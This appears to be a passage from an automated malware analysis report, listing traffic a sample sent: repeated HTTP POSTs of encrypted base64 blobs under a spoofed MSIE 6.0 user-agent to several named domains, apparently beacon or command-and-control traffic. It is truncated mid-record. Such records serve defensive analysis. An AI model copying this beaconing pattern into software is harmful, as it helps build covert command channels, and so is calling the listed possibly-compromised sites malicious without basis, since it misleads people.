UU+MUSVACZrSGT1szPMSAp7PkKVz1j1rKa+V4fhaSk+2cEXfyRAcyoGilkeIFxvCc5vsOvK5ewiIZGGDCZXBovUa1IttNaqEg8cxi4PYE/yi4MxHBITM2zxZv82dPiUHGQmZbzwb/aMyR7r6av+hiZCz6uKNIOAce1OAbhkjLRP2DMzX/iYLNnfvncW266IZbw2OZPhoxTs5z2hMnea9JMANXGuoTfQ+C4KrdboDBFXpJNAruBh4pBHfbU4G+2Xu6J1U8WzMfQTMou7vzaVek1KQKe+AENgqRFkD9XWcmT3I2zBu5rSyYRTa3QcRDeP0ybTeG6Sf7rgwNx9bOGji4oS9QOG2vFxMgDWAI5AcCnhfKh4hNYoBzlArQ/B2T2dMTFd45tKHZLgMoHaJXtgqIamsqnKpbD4bLuKJy69K0aUMU6Tmkz+cXN7WslaphMY/h152gPnw1ejhfVbaZwJmgCuJ0l38fwdYyUEtk6l4rO9oo1EE+8r4ifnD1EjC6IjT5nj90PofZR2cHgfVxhm7DcHx4xQeb4knboph7lhT38Txx4sKiyBgtg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 57 67 53 47 46 54 5a 4d 6d 64 4a 55 34 53 43 63 6b 56 62 62 63 39 6e 69 74 75 74 57 42 6d 59 48 79 70 4d 59 4d 2b 69 4b 69 52 32 4c 33 6f 6b 47 41 66 6f 74 4a 56 7a 64 63 62 65 67 73 63 5a 77 4c 74 5a 64 43 4c 77 4c 6b 74 68 31 32 46 68 73 71 47 75 2f 6f 32 64 58 52 70 78 4b 74 39 55 51 43 67 63 48 78 78 4f 45 68 38 53 5a 6a 4d 48 4d 42 4d 38 6e 74 43 52 46 32 48 6f 51 4e 6c 64 49 5a 44 77 4a 37 45 4d 55 59 4c 47 75 67 68 4e 6f 6f 2f 35 45 62 79 6e 69 42 45 72 66 44 52 73 36 6c 6e 52 76 69 57 77 42 50 34 55 79 65 32 79 4f 30 58 57 33 68 39 4a 55 44 7a 78 37 41 74 65 35 69 56 55 37 35 31 35 7a 30 6a 70 70 45 7a 52 34 47 46 67 78 57 59 4c 4f 2f 39 57 66 6f 72 36 37 38 2f 46 71 2b 69 35 50 51 59 46 57 35 62 59 58 6d 37 54 4c 78 68 46 52 41 55 6b 4f 59 53 51 59 78 45 41 54 4b 75 33 47 65 68 4e 4f 31 35 78 48 58 42 72 73 6e 39 61 47 67 53 50 72 47 66 34 72 49 41 50 38 35 73 38 71 6f 48 39 67 32 50 4c 52 46 48 53 33 49 54 37 42 44 6a 31 62 48 56 57 77 49 52 53 6e 32 51 79 59 63 49 67 2f 30 6d 4e 6a 6a 61 4a 45 59 77 74 70 49 6b 34 33 31 6e 53 47 67 6f 54 34 49 6b 59 51 30 61 70 79 35 55 4d 57 41 33 4a 2b 34 42 4f 4f 38 71 78 39 46 4b 6f 6b 70 41 73 32 73 41 45 32 62 6e 34 57 2b 38 69 64 33 58 53 6f 57 67 75 6e 46 4a 4b 32 54 77 37 32 78 36 6b 38 6a 2b 6e 2b 44 47 39 47 62 4e 76 4d 7a 62 65 47 2f 7a 34 42 47 2f 5a 6a 34 63 6b 39 46 4b 77 55 79 63 7a 6b 6a 45 74 48 32 64 7a 75 4f 71 45 43 4c 31 44 6c 35 61 78 46 75 70 6c 73 79 57 31 4d 59 48 6f 2f 66 32 36 76 35 4f 63 75 52 47 64 68 4d 47 58 4c 2f 62 35 39 72 63 33 36 30 46 70 72 59 36 30 79 31 4f 4f 2b 39 50 69 4f 35 75 75 4f 44 68 66 75 65 54 42 44 47 62 57 78 4b 33 44 6d 4f 76 67 3d Data Ascii: WgSGFTZMmdJU4SCckVbbc9nitutWBmYHypMYM+iKiR2L3okGAfotJVzdcbegscZwLtZdCLwLkth12FhsqGu/o2dXRpxKt9UQCgcHxxOEh8SZjMHMBM8ntCRF2HoQNldIZDwJ7EMUYLGughNoo/5EbyniBErfDRs6lnRviWwBP4Uye2yO0XW3h9JUDzx7Ate5iVU7515z0jppEzR4GFgxWYLO/9Wfor678/Fq+i5PQYFW5bYXm7TLxhFRAUkOYSQYxEATKu3GehNO15xHXBrsn9aGgSPrGf4rIAP85s8qoH9g2PLRFHS3IT7BDj1bHVWwIRSn2QyYcIg/0mNjjaJEYwtpIk431nSGgoT4IkYQ0apy5UMWA3J+4BOO8qx9FKokpAs2sAE2bn4W+8id3XSoWgunFJK2Tw72x6k8j+n+DG9GbNvMzbeG/z4BG/Zj4ck9FKwUyczkjEtH2dzuOqECL1Dl5axFuplsyW1MYHo/f26v5OcuRGdhMGXL/b59rc360FprY60y1OO+9PiO5uuODhfueTBDGbWxK3DmOvg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 63 47 30 63 77 52 2b 41 48 5a 70 46 35 42 52 49 66 73 34 42 56 4b 6a 6a 6e 47 37 31 31 74 42 6c 77 33 6e 78 4f 54 48 30 43 35 41 46 67 6d 68 37 51 71 78 63 58 7a 65 6b 32 61 61 42 37 63 4c 38 2b 44 41 70 76 62 62 68 35 79 34 50 70 64 32 73 50 68 79 47 59 33 2b 4c 44 4c 46 31 5a 68 65 30 34 38 57 37 66 63 5a 68 31 35 4f 52 41 59 59 4c 31 63 45 31 6b 45 54 61 67 33 79 6c 52 54 57 43 53 6e 6f 78 34 34 37 34 6b 32 4c 45 7a 6a 61 2b 59 37 38 57 58 4f 36 79 37 55 6f 2f 64 30 63 71 4e 6d 46 4c 57 2f 64 48 72 50 64 61 6f 53 74 45 54 50 32 73 50 71 34 41 65 78 6d 42 43 5a 4e 4d 6f 6e 44 65 62 4c 76 46 30 61 42 45 63 79 4e 34 6b 41 74 77 45 6e 31 32 39 72 47 51 54 64 6d 45 5a 75 4d 30 75 35 2b 6e 75 44 7a 56 4b 4c 55 31 47 69 56 50 43 68 72 33 58 68 30 64 73 4a 78 66 53 72 78 49 31 78 6e 71 6a 44 76 32 63 39 69 52 67 79 53 6e 4d 2f 47 2f 30 38 69 2f 58 6c 45 37 42 4d 45 68 70 48 31 73 7a 63 69 62 74 56 69 53 59 6d 47 6e 37 4b 6b 4c 64 6e 56 74 63 46 6a 52 2b 33 47 6d 44 74 38 65 4b 6b 46 6d 45 50 55 56 45 37 31 4d 30 39 78 4f 6c 75 50 4a 50 35 37 2f 43 43 2f 73 46 32 30 76 66 53 44 49 6c 71 78 77 70 65 2b 6b 6c 68 58 30 50 72 48 65 44 35 33 64 79 66 73 7a 64 7a 68 33 71 58 5a 32 35 51 6f 43 44 43 6f 74 42 70 37 38 71 48 72 6a 55 69 62 4c 79 32 5a 72 75 37 6c 4f 65 32 67 74 37 48 79 65 63 31 68 46 34 49 48 65 74 35 62 71 74 61 6f 6c 33 55 79 58 4b 7a 52 7a 4d 37 4e 5a 78 73 65 4e 51 42 61 2b 4e 2f 55 74 4c 66 48 43 67 41 4a 59 6b 65 5a 33 70 4d 30 6c 53 6e 53 76 46 56 75 54 46 65 75 2f 7a 55 77 30 63 6e 72 4c 66 69 51 73 79 42 53 6f 76 52 49 49 64 47 48 35 61 4c 52 56 6f 46 67 50 43 30 52 54 6c 78 31 61 32 39 51 52 47 79 31 33 6e 49 6c 41 49 70 72 2b 4a 6e 49 4b 43 43 43 37 6a 56 65 4e 75 6f 51 73 31 34 74 56 42 55 51 33 54 77 50 45 65 54 45 53 6a 36 58 54 36 38 63 34 7a 38 4d 3d Data Ascii: cG0cwR+AHZpF5BRIfs4BVKjjnG711tBlw3nxOTH0C5AFgmh7QqxcXzek2aaB7cL8+DApvbbh5y4Ppd2sPhyGY3+LDLF1Zhe048W7fcZh15ORAYYL1cE1kETag3ylRTWCSnox4474k2LEzja+Y78WXO6y7Uo/d0cqNmFLW/dHrPdaoStETP2sPq4AexmBCZNMonDebLvF0aBEcyN4kAtwEn129rGQTdmEZuM0u5+nuDzVKLU1GiVPChr3Xh0dsJxfSrxI1xnqjDv2c9iRgySnM/G/08i/XlE7BMEhpH1szcibtViSYmGn7KkLdnVtcFjR+3GmDt8eKkFmEPUVE71M09xOluPJP57/CC/sF20vfSDIlqxwpe+klhX0PrHeD53dyfszdzh3qXZ25QoCDCotBp78qHrjUibLy2Zru7lOe2gt7Hyec1hF4IHet5bqtaol3UyXKzRzM7NZxseNQBa+N/UtLfHCgAJYkeZ3pM0lSnSvFVuTFeu/zUw0cnrLfiQsyBSovRIIdGH5aLRVoFgPC0RTlx1a29QRGy13nIlAIpr+JnIKCCC7jVeNuoQs14tVBUQ3TwPEeTESj6XT68c4z8M=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 51 4c 62 67 46 53 64 50 6d 64 49 6e 55 33 47 45 31 6f 4b 51 76 76 42 76 66 7a 69 64 35 6a 36 64 53 2f 32 71 45 6a 6f 70 66 43 6a 62 72 58 61 63 58 6c 63 69 57 37 31 41 72 54 48 66 74 50 4f 67 76 65 4b 54 30 72 4f 62 35 67 6a 4b 42 46 44 36 41 45 35 32 67 70 61 44 33 4e 6e 73 2f 78 58 4a 38 2f 39 41 41 72 35 76 4d 30 56 42 6b 53 75 57 4d 48 51 36 36 42 37 49 46 35 65 42 48 30 30 4f 70 61 66 36 51 62 6a 58 36 6c 50 4e 33 50 35 7a 4b 38 78 36 45 54 4c 6a 70 32 6b 71 43 61 63 43 4a 76 76 4c 37 4b 6b 63 67 41 41 4c 47 51 48 42 73 74 6f 63 78 76 6f 70 45 50 2f 56 67 4b 56 42 45 72 4b 43 57 4a 52 35 77 49 74 6f 6e 71 6b 50 6c 72 4c 32 59 33 31 38 4a 6d 4d 74 51 6a 4b 64 38 43 2b 50 71 2b 65 45 4c 32 33 43 38 53 31 2b 52 4b 56 6f 6e 4f 74 55 56 56 6b 39 64 4f 4c 58 4d 58 76 78 78 50 75 54 54 77 59 55 72 79 6c 67 32 4b 43 7a 75 69 52 53 48 67 30 36 48 5a 64 4f 56 64 7a 65 4c 50 56 67 2f 31 2f 61 32 2f 6b 32 50 32 32 6c 79 71 46 30 42 58 4e 39 4f 47 54 4f 4f 57 34 56 57 37 33 2f 6f 2f 52 6a 37 7a 41 52 57 76 52 46 2f 2f 32 53 43 63 4c 76 4f 6f 56 56 6a 62 36 47 63 54 62 55 43 6b 77 7a 42 32 30 30 49 6f 45 65 6e 36 73 78 6c 63 37 59 77 63 65 54 73 45 33 30 58 32 61 4a 2f 49 65 56 57 70 76 37 4f 6a 69 7a 77 44 39 48 68 50 48 43 75 66 74 73 6d 69 7a 55 61 4e 54 48 57 5a 35 79 6f 42 7a 33 48 69 55 6b 50 63 72 4f 46 4e 6a 77 55 2f 34 6a 37 54 59 6a 6b 4d 55 65 6b 65 4d 73 52 45 4d 39 68 74 71 2f 70 71 68 55 2b 72 38 70 32 66 6f 72 54 37 51 4e 31 33 34 34 70 7a 6f 7a 68 65 43 6b 4d 55 48 6e 4a 6c 77 75 70 50 68 46 59 6b 65 5a 51 64 4e 6d 58 74 2f 6d 50 71 6f 42 50 55 5a 35 76 55 4c 57 72 59 62 48 45 64 50 68 6b 66 72 2f 7a 6a 39 43 4a 59 32 4c 54 61 34 6d 38 79 35 51 42 38 57 46 4d 42 70 68 30 5a 32 2b 5a 5a 45 7a 6a 4e 6d 70 71 52 6a 6e 4d 67 3d 3d Data Ascii: QLbgFSdPmdInU3GE1oKQvvBvfzid5j6dS/2qEjopfCjbrXacXlciW71ArTHftPOgveKT0rOb5gjKBFD6AE52gpaD3Nns/xXJ8/9AAr5vM0VBkSuWMHQ66B7IF5eBH00Opaf6QbjX6lPN3P5zK8x6ETLjp2kqCacCJvvL7KkcgAALGQHBstocxvopEP/VgKVBErKCWJR5wItonqkPlrL2Y318JmMtQjKd8C+Pq+eEL23C8S1+RKVonOtUVVk9dOLXMXvxxPuTTwYUrylg2KCzuiRSHg06HZdOVdzeLPVg/1/a2/k2P22lyqF0BXN9OGTOOW4VW73/o/Rj7zARWvRF//2SCcLvOoVVjb6GcTbUCkwzB200IoEen6sxlc7YwceTsE30X2aJ/IeVWpv7OjizwD9HhPHCuftsmizUaNTHWZ5yoBz3HiUkPcrOFNjwU/4j7TYjkMUekeMsREM9htq/pqhU+r8p2forT7QN1344pzozheCkMUHnJlwupPhFYkeZQdNmXt/mPqoBPUZ5vULWrYbHEdPhkfr/zj9CJY2LTa4m8y5QB8WFMBph0Z2+ZZEzjNmpqRjnMg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 61 63 34 57 35 43 58 7a 4a 70 70 4e 41 59 2b 47 7a 41 72 6e 55 35 37 36 66 34 31 7a 68 59 53 77 4b 63 72 73 57 65 38 31 42 62 5a 74 5a 69 4f 6b 78 47 66 45 69 46 67 39 54 6e 52 72 39 2f 76 73 76 36 2f 73 65 6d 67 4d 6a 36 68 35 45 73 38 7a 38 56 77 64 52 38 35 77 55 39 37 6f 38 72 43 54 67 72 4c 77 42 53 74 42 51 51 55 32 38 58 57 6a 6c 2b 66 6b 42 4e 7a 6e 67 34 4a 76 2b 59 79 7a 78 48 63 37 76 41 7a 63 62 6f 62 72 33 6f 6d 37 6b 66 4b 6a 6f 32 32 42 42 68 34 73 6b 74 35 49 6e 31 66 66 39 69 31 73 67 70 57 32 42 2f 51 36 58 6a 76 64 63 73 6e 71 56 62 72 39 30 52 36 65 4f 75 45 57 35 71 6b 6e 4f 77 37 7a 51 73 35 58 31 65 57 44 7a 55 4c 67 6f 49 41 78 76 33 6a 58 2b 6e 5a 50 66 78 78 68 4b 63 49 41 61 31 67 54 52 56 79 43 51 59 46 52 75 54 62 6f 7a 68 74 57 51 4b 50 72 6f 54 52 7a 78 68 57 52 31 4a 65 63 2f 6e 32 57 74 6c 55 6c 46 67 45 79 6a 49 48 35 64 66 4b 47 2b 73 6b 4a 63 4d 64 50 41 34 37 4d 54 76 42 73 51 66 49 34 50 64 4a 43 58 71 56 39 78 41 36 41 4d 71 70 6d 2b 42 67 66 5a 4d 69 59 65 38 77 38 45 5a 4c 65 2f 70 58 30 4c 52 54 33 65 70 52 6a 5a 74 35 2f 56 63 2b 70 50 71 45 38 2f 64 56 63 68 46 79 6c 41 32 76 66 51 4f 63 58 69 61 63 63 7a 67 6d 35 76 5a 38 54 72 58 77 47 4d 41 37 77 6e 6e 35 59 4e 6a 76 48 48 57 55 4c 33 79 37 56 33 78 30 6c 46 50 41 67 6a 32 67 61 4d 59 33 34 50 66 61 43 38 43 35 74 31 46 63 30 30 36 32 73 79 41 57 77 4e 6f 67 58 6a 2b 7a 75 74 74 62 78 79 70 74 32 77 43 78 41 41 6e 57 50 78 32 47 74 48 4c 6e 54 49 55 67 39 59 72 67 54 72 68 49 39 48 62 32 71 33 69 4f 6e 62 6e 64 4b 4e 4a 38 2b 71 38 44 47 36 33 56 56 79 41 58 51 74 6e 6e 58 57 57 7a 37 37 73 79 4e 77 6b 61 72 Data Ascii: ac4W5CXzJppNAY+GzArnU576f41zhYSwKcrsWe81BbZtZiOkxGfEiFg9TnRr9/vsv6/semgMj6h5Es8z8VwdR85wU97o8rCTgrLwBStBQQU28XWjl+fkBNzng4Jv+YyzxHc7vAzcbobr3om7kfKjo22BBh4skt5In1ff9i1sgpW2B/Q6XjvdcsnqVbr90R6eOuEW5qknOw7zQs5X1eWDzULgoIAxv3jX+nZPfxxhKcIAa1gTRVyCQYFRuTbozhtWQKProTRzxhWR1Jec/n2WtlUlFgEyjIH5dfKG+skJcMdPA47MTvBsQfI4PdJCXqV9xA6AMqpm+BgfZMiYe8w8EZLe/pX0LRT3epRjZt5/Vc+pPqE8/dVchFylA2vfQOcXiacczgm5vZ8TrXwGMA7wnn5YNjvHHWUL3y7V3x0lFPAgj2gaMY34PfaC8C5t1Fc0062syAWwNogXj+zuttbxypt2wCxAAnWPx2GtHLnTIUg9YrgTrhI9Hb2q3iOnbndKNJ8+q8DG63VVyAXQtnnXWWz77syNwkar
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 56 4d 39 48 7a 59 55 31 4a 70 70 64 6f 36 4e 68 72 4b 6d 76 67 2f 35 4c 33 57 31 54 4a 77 34 32 69 51 4c 46 62 58 50 34 30 78 48 31 56 4f 4f 54 4d 6c 31 66 58 2b 6d 4c 6d 75 65 7a 6a 6a 71 37 39 32 54 4e 4b 41 43 63 73 33 54 62 44 65 59 64 59 6d 68 58 68 41 55 51 69 2f 6e 6a 63 50 79 6e 41 41 7a 6a 62 2b 61 55 6c 48 57 67 30 66 53 41 6b 4a 44 74 33 38 52 6e 53 6a 55 6e 6b 37 63 6a 4b 6d 75 67 4f 63 6f 4c 6e 6a 76 30 55 45 50 35 2f 62 48 41 55 4f 63 76 2f 52 74 6e 55 37 48 58 66 76 50 47 54 53 66 46 32 31 76 64 46 50 47 35 53 74 4b 6e 4f 36 4c 6e 4b 58 48 6b 73 31 4c 4a 72 43 44 53 78 2f 43 72 52 6d 41 46 33 37 61 42 36 74 33 7a 71 58 6b 4a 5a 74 49 61 62 38 39 5a 72 39 63 2f 6e 6a 44 33 4f 55 4d 56 57 36 45 49 6d 66 74 50 56 63 57 66 72 70 42 74 62 2f 57 55 38 4d 74 6c 61 74 2f 34 64 56 76 51 31 35 7a 39 69 39 70 39 6e 31 63 6f 66 35 69 4f 62 31 4a 37 46 72 6d 43 6b 46 59 4c 6c 52 46 34 57 44 41 39 43 74 45 4b 5a 54 31 62 6e 35 65 2f 47 46 78 75 57 50 6e 71 48 77 56 4a 50 6d 55 36 74 4f 64 51 2b 6a 75 33 48 37 66 31 52 4c 36 67 55 71 41 61 56 59 67 75 2f 65 7a 54 41 47 41 38 46 77 30 30 76 36 4f 66 4e 6f 37 65 7a 75 6c 66 6d 67 6a 66 36 64 4b 49 66 6f 35 76 63 31 53 4e 76 66 2b 35 4e 34 55 65 64 61 53 6f 58 61 6e 6d 4f 38 47 76 42 41 63 6b 32 64 47 32 45 4b 6d 33 4b 2f 34 4b 46 63 6d 56 6b 6b 69 76 30 37 73 44 42 4f 74 42 6c 50 2b 4d 42 4e 45 55 76 33 64 50 2b 58 53 58 79 6e 74 39 46 2f 43 6c 36 52 2f 33 46 41 59 38 39 57 2b 6b 68 42 62 73 7a 67 37 47 65 6c 58 54 58 56 43 58 4b 2f 61 65 63 33 7a 46 36 34 38 57 69 49 41 73 43 5a 70 6b 63 6f 78 6a 4f 69 6e 64 2b 53 6e 75 2f 49 37 56 4b 48 55 53 45 71 54 56 74 4c 73 54 76 34 45 37 70 55 52 68 52 34 52 6f 4a 79 53 6f 76 7a 6a 4c 4a 4b 63 3d Data Ascii: VM9HzYU1Jppdo6NhrKmvg/5L3W1TJw42iQLFbXP40xH1VOOTMl1fX+mLmuezjjq792TNKACcs3TbDeYdYmhXhAUQi/njcPynAAzjb+aUlHWg0fSAkJDt38RnSjUnk7cjKmugOcoLnjv0UEP5/bHAUOcv/RtnU7HXfvPGTSfF21vdFPG5StKnO6LnKXHks1LJrCDSx/CrRmAF37aB6t3zqXkJZtIab89Zr9c/njD3OUMVW6EImftPVcWfrpBtb/WU8Mtlat/4dVvQ15z9i9p9n1cof5iOb1J7FrmCkFYLlRF4WDA9CtEKZT1bn5e/GFxuWPnqHwVJPmU6tOdQ+ju3H7f1RL6gUqAaVYgu/ezTAGA8Fw00v6OfNo7ezulfmgjf6dKIfo5vc1SNvf+5N4UedaSoXanmO8GvBAck2dG2EKm3K/4KFcmVkkiv07sDBOtBlP+MBNEUv3dP+XSXynt9F/Cl6R/3FAY89W+khBbszg7GelXTXVCXK/aec3zF648WiIAsCZpkcoxjOind+Snu/I7VKHUSEqTVtLsTv4E7pURhR4RoJySovzjLJKc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 63 47 30 63 77 52 2b 41 48 5a 70 46 35 42 52 49 66 73 34 42 56 4b 6a 6a 6e 47 37 31 31 74 42 6c 77 33 6e 78 4f 54 48 30 43 35 41 46 67 6d 68 37 51 71 78 63 58 7a 65 6b 32 61 61 42 37 63 4c 38 2b 44 41 70 76 62 62 68 35 79 34 50 70 64 32 73 50 68 79 47 59 33 2b 4c 44 4c 46 31 5a 68 65 30 34 38 57 37 66 63 5a 68 31 35 4f 52 41 59 59 4c 31 63 45 31 6b 45 54 61 67 33 79 6c 52 54 57 43 53 6e 6f 78 34 34 37 34 6b 32 4c 45 7a 6a 61 2b 59 37 38 57 58 4f 36 79 37 55 6f 2f 64 30 63 71 4e 6d 46 4c 57 2f 64 48 72 50 64 61 6f 53 74 45 54 50 32 73 50 71 34 41 65 78 6d 42 43 5a 4e 4d 6f 6e 44 65 62 4c 76 46 30 61 42 45 63 79 4e 34 6b 41 74 77 45 6e 31 32 39 72 47 51 54 64 6d 45 5a 75 4d 30 75 35 2b 6e 75 44 7a 56 4b 4c 55 31 47 69 56 50 43 68 72 33 58 68 30 64 73 4a 78 66 53 72 78 49 31 78 6e 71 6a 44 76 32 63 39 69 52 67 79 53 6e 4d 2f 47 2f 30 38 69 2f 58 6c 45 37 42 4d 45 68 70 48 31 73 7a 63 69 62 74 56 69 53 59 6d 47 6e 37 4b 6b 4c 64 6e 56 74 63 46 6a 52 2b 33 47 6d 44 74 38 65 4b 6b 46 6d 45 50 55 56 45 37 31 4d 30 39 78 4f 6c 75 50 4a 50 35 37 2f 43 43 2f 73 46 32 30 76 66 53 44 49 6c 71 78 77 70 65 2b 6b 6c 68 58 30 50 72 48 65 44 35 33 64 79 66 73 7a 64 7a 68 33 71 58 5a 32 35 51 6f 43 44 43 6f 74 42 70 37 38 71 48 72 6a 55 69 62 4c 79 32 5a 72 75 37 6c 4f 65 32 67 74 37 48 79 65 63 31 68 46 34 49 48 65 74 35 62 71 74 61 6f 6c 33 55 79 58 4b 7a 52 7a 4d 37 4e 5a 78 73 65 4e 51 42 61 2b 4e 2f 55 74 4c 66 48 43 67 41 4a 59 6b 65 5a 33 70 4d 30 6c 53 6e 53 76 46 56 75 54 46 65 75 2f 7a 55 77 30 63 6e 72 4c 66 69 51 73 79 42 53 6f 76 52 49 49 64 47 48 35 61 4c 52 56 6f 46 67 50 43 30 52 54 6c 78 31 61 32 39 51 52 47 79 31 33 6e 49 6c 41 49 70 72 2b 4a 6e 49 4b 43 43 43 37 6a 56 65 4e 75 6f 51 73 31 34 74 56 42 55 51 33 54 77 50 45 65 54 45 53 6a 36 58 54 36 38 63 34 7a 38 4d 3d Data Ascii: cG0cwR+AHZpF5BRIfs4BVKjjnG711tBlw3nxOTH0C5AFgmh7QqxcXzek2aaB7cL8+DApvbbh5y4Ppd2sPhyGY3+LDLF1Zhe048W7fcZh15ORAYYL1cE1kETag3ylRTWCSnox4474k2LEzja+Y78WXO6y7Uo/d0cqNmFLW/dHrPdaoStETP2sPq4AexmBCZNMonDebLvF0aBEcyN4kAtwEn129rGQTdmEZuM0u5+nuDzVKLU1GiVPChr3Xh0dsJxfSrxI1xnqjDv2c9iRgySnM/G/08i/XlE7BMEhpH1szcibtViSYmGn7KkLdnVtcFjR+3GmDt8eKkFmEPUVE71M09xOluPJP57/CC/sF20vfSDIlqxwpe+klhX0PrHeD53dyfszdzh3qXZ25QoCDCotBp78qHrjUibLy2Zru7lOe2gt7Hyec1hF4IHet5bqtaol3UyXKzRzM7NZxseNQBa+N/UtLfHCgAJYkeZ3pM0lSnSvFVuTFeu/zUw0cnrLfiQsyBSovRIIdGH5aLRVoFgPC0RTlx1a29QRGy13nIlAIpr+JnIKCCC7jVeNuoQs14tVBUQ3TwPEeTESj6XT68c4z8M=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 51 4c 62 67 46 53 64 50 6d 64 49 6e 55 33 47 45 31 6f 4b 51 76 76 42 76 66 7a 69 64 35 6a 36 64 53 2f 32 71 45 6a 6f 70 66 43 6a 62 72 58 61 63 58 6c 63 69 57 37 31 41 72 54 48 66 74 50 4f 67 76 65 4b 54 30 72 4f 62 35 67 6a 4b 42 46 44 36 41 45 35 32 67 70 61 44 33 4e 6e 73 2f 78 58 4a 38 2f 39 41 41 72 35 76 4d 30 56 42 6b 53 75 57 4d 48 51 36 36 42 37 49 46 35 65 42 48 30 30 4f 70 61 66 36 51 62 6a 58 36 6c 50 4e 33 50 35 7a 4b 38 78 36 45 54 4c 6a 70 32 6b 71 43 61 63 43 4a 76 76 4c 37 4b 6b 63 67 41 41 4c 47 51 48 42 73 74 6f 63 78 76 6f 70 45 50 2f 56 67 4b 56 42 45 72 4b 43 57 4a 52 35 77 49 74 6f 6e 71 6b 50 6c 72 4c 32 59 33 31 38 4a 6d 4d 74 51 6a 4b 64 38 43 2b 50 71 2b 65 45 4c 32 33 43 38 53 31 2b 52 4b 56 6f 6e 4f 74 55 56 56 6b 39 64 4f 4c 58 4d 58 76 78 78 50 75 54 54 77 59 55 72 79 6c 67 32 4b 43 7a 75 69 52 53 48 67 30 36 48 5a 64 4f 56 64 7a 65 4c 50 56 67 2f 31 2f 61 32 2f 6b 32 50 32 32 6c 79 71 46 30 42 58 4e 39 4f 47 54 4f 4f 57 34 56 57 37 33 2f 6f 2f 52 6a 37 7a 41 52 57 76 52 46 2f 2f 32 53 43 63 4c 76 4f 6f 56 56 6a 62 36 47 63 54 62 55 43 6b 77 7a 42 32 30 30 49 6f 45 65 6e 36 73 78 6c 63 37 59 77 63 65 54 73 45 33 30 58 32 61 4a 2f 49 65 56 57 70 76 37 4f 6a 69 7a 77 44 39 48 68 50 48 43 75 66 74 73 6d 69 7a 55 61 4e 54 48 57 5a 35 79 6f 42 7a 33 48 69 55 6b 50 63 72 4f 46 4e 6a 77 55 2f 34 6a 37 54 59 6a 6b 4d 55 65 6b 65 4d 73 52 45 4d 39 68 74 71 2f 70 71 68 55 2b 72 38 70 32 66 6f 72 54 37 51 4e 31 33 34 34 70 7a 6f 7a 68 65 43 6b 4d 55 48 6e 4a 6c 77 75 70 50 68 46 59 6b 65 5a 51 64 4e 6d 58 74 2f 6d 50 71 6f 42 50 55 5a 35 76 55 4c 57 72 59 62 48 45 64 50 68 6b 66 72 2f 7a 6a 39 43 4a 59 32 4c 54 61 34 6d 38 79 35 51 42 38 57 46 4d 42 70 68 30 5a 32 2b 5a 5a 45 7a 6a 4e 6d 70 71 52 6a 6e 4d 67 3d 3d Data Ascii: QLbgFSdPmdInU3GE1oKQvvBvfzid5j6dS/2qEjopfCjbrXacXlciW71ArTHftPOgveKT0rOb5gjKBFD6AE52gpaD3Nns/xXJ8/9AAr5vM0VBkSuWMHQ66B7IF5eBH00Opaf6QbjX6lPN3P5zK8x6ETLjp2kqCacCJvvL7KkcgAALGQHBstocxvopEP/VgKVBErKCWJR5wItonqkPlrL2Y318JmMtQjKd8C+Pq+eEL23C8S1+RKVonOtUVVk9dOLXMXvxxPuTTwYUrylg2KCzuiRSHg06HZdOVdzeLPVg/1/a2/k2P22lyqF0BXN9OGTOOW4VW73/o/Rj7zARWvRF//2SCcLvOoVVjb6GcTbUCkwzB200IoEen6sxlc7YwceTsE30X2aJ/IeVWpv7OjizwD9HhPHCuftsmizUaNTHWZ5yoBz3HiUkPcrOFNjwU/4j7TYjkMUekeMsREM9htq/pqhU+r8p2forT7QN1344pzozheCkMUHnJlwupPhFYkeZQdNmXt/mPqoBPUZ5vULWrYbHEdPhkfr/zj9CJY2LTa4m8y5QB8WFMBph0Z2+ZZEzjNmpqRjnMg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 2b 76 6c 33 4a 70 46 35 71 74 4a 7a 6e 53 67 33 4d 4f 57 76 75 75 71 48 51 6a 78 50 43 68 37 68 56 61 48 44 58 33 2f 6b 6d 67 58 6b 30 37 69 78 78 6b 79 32 62 2f 79 63 55 4b 35 75 34 58 65 78 43 55 47 6c 78 41 75 54 6e 32 4a 55 70 73 30 35 6f 73 50 70 79 54 55 5a 68 6c 71 2f 32 30 4c 43 43 50 75 30 57 62 53 4f 4b 4c 75 70 53 75 50 59 54 34 38 2b 6f 4d 70 65 45 36 47 46 44 36 6c 68 2f 6f 34 70 30 74 77 51 57 42 4c 77 54 34 4f 4e 5a 44 38 51 79 62 51 4e 61 63 67 51 51 6b 57 45 66 6c 4b 46 7a 38 35 4c 36 30 79 41 68 37 68 4b 77 43 58 